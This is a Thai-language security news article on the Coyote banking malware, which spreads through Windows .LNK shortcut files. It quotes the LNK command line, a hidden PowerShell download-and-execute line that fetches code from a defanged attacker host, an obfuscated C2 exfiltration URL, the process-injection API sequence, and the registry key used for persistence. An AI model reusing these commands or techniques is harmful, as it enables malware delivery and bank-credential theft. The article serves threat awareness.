มัลแวร์ดูดเงิน Coyote ใช้ประโยชน์จากไฟล์ LNK เพื่อรันสคริปท์ฝังมัลแวร์ลงเครื่อง

มัลแวร์ดูดเงิน หรือ Banking Malware นั้นเรียกได้ว่าเป็นปัญหาที่กำลังเป็นประเด็นหลักในสังคม เนื่องจากความเดือดร้อนจากมัลแวร์สามารถเห็นเป็นตัวเงินได้อย่างชัดเจน

จากรายงานโดยเว็บไซต์ Cyber Security News ได้รายงานถึงการตรวจพบแคมเปญการโจมตีของมัลแวร์ Coyote ซึ่งเป็นมัลแวร์ประเภทดูดเงินจากบัญชีธนาคาร หรือ Banking Malware ตัวหนึ่งที่มีความสามารถในการดักจับการพิมพ์ของเหยื่อ (Keylogging), แอบบันทึกหน้าจอของเหยื่อ, ไปจนถึงการปลอมหน้าเพจหรือแอปพลิเคชันธนาคาร เพื่อหลอกให้เหยื่อป้อนรหัสผ่านให้แฮกเกอร์นำไปใช้ในการขโมยเงินจากบัญชีของเหยื่อ และมัลแวร์ยังกล่าวยังมีความสามารถในการปิด Process หรือแม้แต่ปิดเครื่องของเหยื่อก็สามารถทำได้ ซึ่งปัจจุบันนั้น มัลแวร์ตัวดังกล่าวกำลังระบาดหนักในประเทศบราซิล โดยมุ่งเน้นเป้าหมายไปยังกลุ่มบรรษัทการเงินต่าง ๆ เช่น ธนาคาร เป็นต้น

ภาพจาก : https://cybersecuritynews.com/coyote-banking-malware-weaponizing-windows-lnk-files/

สำหรับการทำงานระหว่างมัลแวร์ดังกล่าวร่วมกับไฟล์ .LNK ซึ่งเป็นไฟล์ Internet Shortcut ที่ถูกนำมาใช้เป็นพาหะในการดาวน์โหลดไฟล์มัลแวร์นกต่อ (Loader) ลงมานั้น จะมีการถูกเขียนขึ้นด้วยการฝัง Argument (การกำหนด หรือรับค่าที่จะนำไปใช้งานในฟังก์ชัน) ในส่วนของ Target Path ดังนี้

cmd.exe /c powershell.exe -ExecutionPolicy Bypass -File malicious.ps1

ซึ่งหลังจากที่รันขึ้นมาแล้ว ก็จะนำไปสู่การดาวน์โหลด และรัน PowerShell Script ที่โค้ดภายในเริ่มต้นด้วย

-w hid -noni -ep Bypass -c "Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri 'hxxps://tbet[.]geontrigame[.]com/zxchzzmism' -UseBasicParsing).Content }; Start-Sleep 131."

นอกจากนั้นแล้ว ยังมีการตรวจพบว่าตัวไฟล์ DLL ของมัลแวร์นกต่อ (Loader) ในขั้นตอนใดขั้นตอนหนึ่ง (แหล่งข่าวไม่ได้ระบุเจาะจงไว้) ที่มีชื่อว่า bmwiMcDec.dll ได้มีการยิง Embedded Data Segments ที่ถูกถอดรหัส (Decoded) แล้ว 2 ตัวลงไปยังหน่วยความจำ ผ่านการใช้ฟังก์ชันของ Windows API ที่มีชื่อว่า VirtualAllocEx และ WriteProcessMemory ซึ่งตัวไฟล์ DLL นั้นจะดำเนินการยิงโค้ดดังกล่าวด้วยฟังก์ชันหลักชื่อว่า CreateRemoteThread

หลังจากที่มัลแวร์ได้ติดตั้งตัวเองลงสู่เครื่องเป็นที่เรียบร้อยแล้ว ก็จะทำการเพิ่ม Registry ลงไปบนระบบ เพื่อรับประกันว่าตัวมัลแวร์จะสามารถรันบนระบบเครื่องของเหยื่อได้ทุกครั้งที่เปิดเครื่อง (Persistence) ซึ่งรูปแบบของ Registry นั้นเป็นดังนี้

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

และท้ายสุด ตัวมัลแวร์จะทำการติดต่อกับเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) ผ่านช่องทาง SSL เพื่อส่งข้อมูลต่าง ๆ เช่น ข้อมูลของตัวระบบ, ข้อมูลชื่อผู้ใช้งาน, และข้อมูลซอฟต์แวร์แอนตี้ไวรัสที่ติดตั้งอยู่บนระบบ ซึ่งข้อมูลต่าง ๆ นั้นจะผ่านการเข้ารหัสในรูปแบบ Base64 แล้วทำการเรียงข้อมูลย้อนกลับเพื่อสร้างความสับสนให้กับเครื่องมือรักษาความปลอดภัยของระบบ (Obfuscation) ซึ่งตัวอย่าง URL ของตัวเซิร์ฟเวอร์ C2 นั้นมักจะมาในรูปแบบนี้

hxxps://yezh[.]geontrigame[.]com/hqizjs/?I=y4CMuADfvJHUgATMgM3dvRmbpdFIOZ2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzImcoNEfOIDROUI

ดังนั้นเพื่อความปลอดภัย ผู้อ่านทั้งหลายต้องมีความระมัดระวังเพื่อพบไฟล์ .LNK ที่มีความผิดปกติ ผิดสังเกต เพราะการคลิกนั้น อาจนำพาไปสู่การติดมัลแวร์ได้